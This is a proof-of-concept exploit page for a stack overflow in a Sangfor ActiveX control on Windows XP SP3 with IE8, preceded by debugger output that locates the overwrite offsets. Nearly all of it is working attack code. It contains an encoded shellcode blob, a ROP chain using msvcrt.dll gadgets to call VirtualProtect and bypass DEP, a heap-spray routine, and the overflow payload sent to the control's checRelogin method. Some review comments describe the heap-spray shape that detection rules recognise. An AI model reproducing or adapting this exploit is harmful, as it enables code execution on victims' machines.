简要描述:
[+] Looking for cyclic pattern in memory
Cyclic pattern (normal) found at 0x03750630 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03750e66 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03df203d (length 1000 bytes)
Cyclic pattern (normal) found at 0x03e54d1d (length 1000 bytes)
Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes)
Cyclic pattern (unicode) found at 0x03745da4 (length 252 bytes)
Cyclic pattern (unicode) found at 0x03747e38 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03748d2e (length 999 bytes)
Cyclic pattern (unicode) found at 0x0407063a (length 999 bytes)
Cyclic pattern (unicode) found at 0x040c6236 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040c6a64 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03e09bce (length 999 bytes)
EIP overwritten with normal pattern : 0x67413367 (offset 190)
ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802)
EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746)
[+] Examining SEH chain
SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data
code 区域
<html>
<head>
<title>Sangfor Activex stack overflow PoC bypass dep on xpsp3 ie8</title>
</head>
<body>
<!--[+] Looking for cyclic pattern in memory
Cyclic pattern (normal) found at 0x03710440 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03710c76 (length 1000 bytes)
Cyclic pattern (normal) found at 0x00188a88 (length 16 bytes)
Cyclic pattern (normal) found at 0x03dedc28 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03e52d10 (length 1000 bytes)
Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes)
Cyclic pattern (unicode) found at 0x0409d632 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040d6236 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040d6a64 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03705d6c (length 252 bytes)
Cyclic pattern (unicode) found at 0x03707e00 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03708cf6 (length 999 bytes)
Cyclic pattern (unicode) found at 0x03e05fb4 (length 999 bytes)
EIP overwritten with normal pattern : 0x67413367 (offset 190)
ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802)
EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746)
[+] Examining SEH chain
SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data
[+] Examining stack (entire stack) - looking for cyclic pattern
Walking stack from 0x0168f000 to 0x016afffc (0x00020ffc bytes)
0x016ad0f0 : Contains normal cyclic pattern at ESP-0xc4 (-196) : offset 2, length 998 (-> 0x016ad4d5 : ESP+0x322)
-->
<object classid="clsid257CF85-8E97-4C9B-8407-459B28006000" id='poc'></object>
<script>
// [ Shellcode ]
// NOTE(review): opaque %u-escaped blob decoded by unescape(); its contents are not
// analyzed here. The unescape('%u....') form, the 0x0c0c0c0c doubling loops and the
// 400-iteration substring allocations further down are the characteristic browser
// heap-spray shape that IDS/EDR and browser-exploit detection rules key on.
var shellcode = unescape('%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063');
// NOTE(review): the assignment below opens with a run of commented-out lines; the
// value actually assigned is the concatenation starting at the first uncommented
// string literal. The trailing comments list fixed msvcrt.dll addresses for the
// non-ASLR build named in the page title (XP SP3 / IE8); treat them as static
// indicators of this particular PoC, nothing else is verifiable from the page.
var rop_chain = //"\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4B\u77BE" + // 0x77BEBE4B # pop ebp # retn [msvcrt.dll]
// "\u5ED5\u77BE" + // 0x77BE5ED5 # xchg eax, esp # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// The real rop chain
"\ube4b\u77be" + // 0x77bebe4b : ,# POP EBP # RETN [msvcrt.dll]
"\ube4b\u77be" + // 0x77bebe4b : ,# skip 4 bytes [msvcrt.dll]
"\u6e9d\u77c1" + // 0x77c16e9d : ,# POP EBX # RETN [msvcrt.dll]
"\uE000\u0000" + // 0x0000E000 : ,# 0x0000E000-> ebx [dwSize]
"\ucdec\u77c1" + // 0x77c1cdec : ,# POP EDX # RETN [msvcrt.dll]
"\u0040\u0000" + // 0x00000040 : ,# 0x00000040-> edx
"\u79da\u77bf" + // 0x77bf79da : ,# POP ECX # RETN [msvcrt.dll]
"\uf67e\u77c2" + // 0x77c2f67e : ,# &Writable location [msvcrt.dll]
"\uaf6b\u77c0" + // 0x77c0af6b : ,# POP EDI # RETN [msvcrt.dll]
"\u9f92\u77c0" + // 0x77c09f92 : ,# RETN (ROP NOP) [msvcrt.dll]
"\u6f5a\u77c1" + // 0x77c16f5a : ,# POP ESI # RETN [msvcrt.dll]
"\uaacc\u77bf" + // 0x77bfaacc : ,# JMP [EAX] [msvcrt.dll]
"\u289b\u77c2" + // 0x77c2289b : ,# POP EAX # RETN [msvcrt.dll]
"\u1131\u77be" + // 0x77BE1131 : ,# ptr to &VirtualProtect() [IAT msvcrt.dll] 0x20-0xEF=0x31
"\u67f0\u77c2" + // 0x77c267f0 : ,# PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
"\u1025\u77c2"; // 0x77c21025 : ,# ptr to 'push esp # ret ' [msvcrt.dll]
// [ fill the heap with 0x0c0c0c0c ] About 0x2000 Bytes
// NOTE(review): string doubling until length >= 0x1000 UTF-16 units, i.e. 0x2000
// bytes — consistent with the author's size comment above.
var fill = "\u0c0c\u0c0c";
while (fill.length < 0x1000){
fill += fill;
}
// [ padding offset ]
// NOTE(review): padding, evilcode, popeax, xchg, str and payload are assigned
// without var/let/const, so they become implicit globals on the page.
padding = fill.substring(0, 0x5F6);
// [ fill each chunk with 0x1000 bytes ]
evilcode = padding + rop_chain + shellcode + fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length);
// [ repeat the block to 512KB ]
while (evilcode.length < 0x40000){
evilcode += evilcode;
}
// [ substring(2, 0x40000 - 0x21) - XP SP3 + IE8 ]
var block = evilcode.substring(2, 0x40000 - 0x21);
// [ Allocate 200 MB ]
// NOTE(review): 400 copies of a ~512 KB block is ~200 MB only if every copy is
// retained; as written, each iteration overwrites slide (the Array created here
// is replaced on the first pass), so only the latest copy stays referenced and
// whether the engine keeps the earlier ones cannot be determined from the page.
// NOTE(review): the remainder of the for-loop line looks flattened by extraction —
// several statements and the closing tags are printed on one physical line, so
// the `//` comment after popeax runs to the end of that line as printed.
var slide = new Array();
for (var i = 0; i < 400; i++){
slide = block.substring(0, block.length); } var junk = ''; while(junk.length<190) junk += 'A'; popeax = "\x28\x7b\x71\x7d";// 0x7d717b28 {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.6242 (C:\WINDOWS\system32\SHELL32.dll) xchg = "\x79\x68\x44\x3e"; //0x3e446879 {PAGE_EXECUTE_READ} [WININET.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v8.00.6001.19394 (C:\WINDOWS\system32\WININET.dll) str = "\x0c\x0c\x0c\x0c"; payload = junk + popeax + str +str +xchg; poc.checkRelogin(payload); </script> </body> </html>